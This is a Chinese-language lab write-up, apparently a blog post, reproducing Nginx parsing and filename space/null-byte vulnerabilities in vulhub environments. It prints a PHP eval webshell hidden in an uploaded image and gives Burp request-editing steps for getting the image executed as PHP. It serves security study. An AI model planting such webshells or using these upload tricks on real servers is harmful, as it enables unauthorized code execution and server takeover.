Nginx解析与文件逻辑漏洞浮现利用

环境均搭建的vulhub

 

复现工具

burpsuite抓包修改

hackbar插件

带有后门代码的图片,下图区域即为所用后门代码

<?php eval($_REQUEST{'pass'}); ?>

 

复现过程

解析漏洞

f889bf68a52d41eb897f247fe696ff75.png 

如图为搭建环境网页

直接上传我们的后门图片

67874af35c844b69b08690cc38ad2c48.jpg

 

上传图片后访问图片路径,之后就开始利用解析漏洞,具体原理就是在访问路径后加上/xxx.php,这里的xxx可以是任何内容只要有.php即可,由于中间件配置不当,这里会将图片当成php执行,如下图所示 

816bcf24c1814cd58be7d00f4b9fcde8.jpg发现有提示pass,说明复现成功,直接开整

 

 f8836f7e3c1f4db7b0d2e16f50896432.jpg9c1b215d7cf7405aa84a8c37719127da.jpg

 

 

 

 

文件逻辑漏洞

打开搭建环境

7f5afbab9a6245609bd26261f3e45581.jpg 

 

还是上传后门图片,抓包修改一下这里需要,具体就是在文件名后加上一个空格 

5623bb794b2e470d904d131db0bfd3e7.png

 之后我们访问一下图片路径发现没有此文件,说明第一步完成

387a9c24463240e58d25bb404d220d8f.jpg

 

直接抓包重新访问,在文件名后加上(0x20)(0x00).php

37369794f2e44fdfbf7bc8805ff77219.jpg

 

 

复现易错点

1.在解析漏洞环境,后门代码必须是REQUEST,其他的不行

2.在文件逻辑漏洞,修改值得用burp的hex页面进行修改,不能直接在页面直接输入进行访问

 

  • 17
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值